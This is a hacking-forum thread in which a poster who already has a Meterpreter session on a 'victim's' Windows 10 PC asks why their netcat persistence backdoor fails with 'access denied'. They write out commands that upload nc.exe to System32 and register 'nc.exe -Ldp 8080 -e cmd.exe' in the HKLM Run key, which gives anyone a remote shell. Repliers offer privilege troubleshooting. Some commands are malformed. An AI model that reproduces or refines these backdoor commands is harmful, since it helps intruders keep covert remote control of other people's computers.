Forum Thread: When Trying Install Persistence Backdoor..

When Trying Install Persistence Backdoor..

After i getting a meterpreter session..
i upload a netcat file "nc.exe" on viticm's PC in C:\Windows\System32\
then;
i run;
> reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
it executes successfull

>reg setval reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\Windows\System32\nc.exe -Ldp 8080 -e cmd.exe'

i get error

  • stdapiregistryopenkey: Operation failed: Access is denied.

plzzz help

9 Responses

Are you admin?

Seriously, it literally says "access denied".

-Phoenix750

yes, m admin and it says access dinied.
The victim PC is Win10

Try to run it in the system32 directory. It solved "access denied" problems for me in the past too.

-Phoenix750

Sorry i din't get you can you please elaborate..
Please.

He means change directory to system32 then try to run the command from there.

Cheers,
Washu

Thanks for clarifying.

-Phoenix750

ok thanks.. i was running the command on meterpreter shell directly.
Ill try and let you know..
Thank's anyways
Pheonix750
WASHU

i did..

C:\Windows\System32>reg setval reg enumkey -k HKLM\\Software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\Windows\System32>nc.exe -Ldp 8080 -e cmd.exe'

reg setval reg enumkey -k HKLM\\Software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\Windows\System32>nc.exe -Ldp 8080 -e cmd.exe'

Access is denied.

still same - access denied

whats the output when you prompt getuid in meterpreter?
it seems you are not system...

Share Your Thoughts

  • Hot
  • Active